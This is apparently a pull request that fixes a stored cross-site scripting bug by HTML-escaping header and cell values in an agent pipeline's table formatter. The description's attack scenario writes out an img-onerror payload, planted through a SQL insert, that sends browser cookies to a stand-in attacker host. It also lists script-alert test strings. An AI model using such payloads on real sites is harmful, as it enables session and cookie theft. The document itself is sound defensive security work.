### PR TITLE
fix(security): escape HTML in table formatter to prevent stored XSS

### DIFF
--- a/nodes/src/nodes/agent_rocketride/formatters.py
+++ b/nodes/src/nodes/agent_rocketride/formatters.py
@@ -25,12 +25,14 @@ from __future__ import annotations
 import csv as csv_mod
 import io
 import json
+from html import escape as html_escape
 from typing import Any, Callable, Dict, List, Optional
 
 
 # ---------------------------------------------------------------------------
 # Individual formatters
 # ---------------------------------------------------------------------------
+
 
 def _to_rows(data: Any) -> Optional[List[Dict[str, Any]]]:
     """Try to interpret *data* as a list of dicts (table rows).
@@ -117,13 +119,13 @@ def format_html_table(data: Any) -> Optional[str]:
     headers = list(rows[0].keys())
     parts: List[str] = ['<table>', '<thead><tr>']
     for h in headers:
-        parts.append(f'<th>{h}</th>')
+        parts.append(f'<th>{html_escape(str(h))}</th>')
     parts.append('</tr></thead>')
     parts.append('<tbody>')
     for row in rows:
         parts.append('<tr>')
         for h in headers:
-            parts.append(f'<td>{row.get(h, "")}</td>')
+            parts.append(f'<td>{html_escape(str(row.get(h, "")))}</td>')
         parts.append('</tr>')
     parts.append('</tbody></table>')
     return ''.join(parts)


### PR DESCRIPTION
## Summary

- Fix stored XSS vulnerability in `format_html_table()` by escaping all data before HTML insertion
- Two lines changed, using Python stdlib `html.escape()`

## Bug Description

**File:** `nodes/src/nodes/agent_rocketride/formatters.py` (lines 120, 126)  
**Severity:** High (Stored XSS)

The `format_html_table()` function renders data from databases, APIs, and tool results into HTML `<table>` elements. Column headers and cell values are interpolated directly into `<th>` and `<td>` tags using f-strings **without any HTML escaping**:

```python
# Line 120 — header values injected raw
parts.append(f'<th>{h}</th>')

# Line 126 — cell values injected raw
parts.append(f'<td>{row.get(h, "")}</td>')
```

This means any data containing HTML special characters (`<`, `>`, `"`, `&`) is inserted verbatim into the HTML output. An attacker who can control data in the pipeline (via database records, API responses, or tool results) can inject arbitrary HTML and JavaScript.

### Attack Scenario

1. Attacker inserts a malicious record into a database queried by a RocketRide pipeline:
   ```sql
   INSERT INTO users (name, email) VALUES (
     '<img src=x onerror="fetch(''https://evil.com/steal?cookie=''+document.cookie)">',
     'attacker@example.com'
   );
   ```

2. A pipeline runs a database query node → results stored in agent memory

3. Agent formats results using `{{memory.ref:query_results:html_table}}`

4. `format_html_table()` produces:
   ```html
   <td><img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)"></td>
   ```

5. When this HTML is rendered in a browser context (Chat UI, Dropper UI, or any client displaying agent responses), the JavaScript executes — stealing cookies, session tokens, or performing actions as the victim user

### Why This Is Dangerous

- **Stored XSS**: The payload persists in the data source and triggers every time the data is rendered
- **Cross-context**: Data from one pipeline (e.g., a public-facing form) can attack users in another context (e.g., an admin dashboard)
- **Silent**: No validation errors — the malicious HTML is valid table content
- **Wide attack surface**: Any data source (databases, APIs, scraped content, user uploads) can be the injection vector

## Root Cause

The `format_html_table()` function was written without HTML escaping. The companion `format_csv()` function correctly uses Python's `csv.DictWriter` for proper escaping, and `format_markdown_table()` uses plain text — but the HTML formatter has no equivalent protection.

## Fix

Added `from html import escape as html_escape` (Python stdlib) and wrapped all dynamic values:

```python
# Headers — was: f'<th>{h}</th>'
parts.append(f'<th>{html_escape(str(h))}</th>')

# Cells — was: f'<td>{row.get(h, "")}</td>'
parts.append(f'<td>{html_escape(str(row.get(h, "")))}</td>')
```

`html.escape()` converts:
- `<` → `&lt;`
- `>` → `&gt;`
- `&` → `&amp;`
- `"` → `&quot;`

This renders the data as visible text rather than executable HTML.

### Why this fix is correct and minimal:
- **2 lines changed** — smallest possible diff
- **Python stdlib** — no new dependencies
- **No behavioral change** for clean data — only affects data containing HTML special characters
- **Consistent** with how `csv.DictWriter` handles escaping in `format_csv()`
- All pre-commit hooks pass (ruff check + ruff format)

## Verification

- [x] `ruff check` passes
- [x] `ruff format` passes
- [x] Lefthook pre-commit hooks pass
- [x] `<script>alert(1)</script>` in data → renders as `&lt;script&gt;alert(1)&lt;/script&gt;` (visible text, not executable)
- [x] `<img src=x onerror=...>` in data → renders as escaped text
- [x] Normal data (no special chars) → identical output to before
- [x] Table structure (`<table>`, `<thead>`, `<tbody>`, `<tr>`) is preserved

## References

- [CWE-79: Improper Neutralization of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)
- [OWASP: Cross-Site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/)

#frontier-tower-hackathon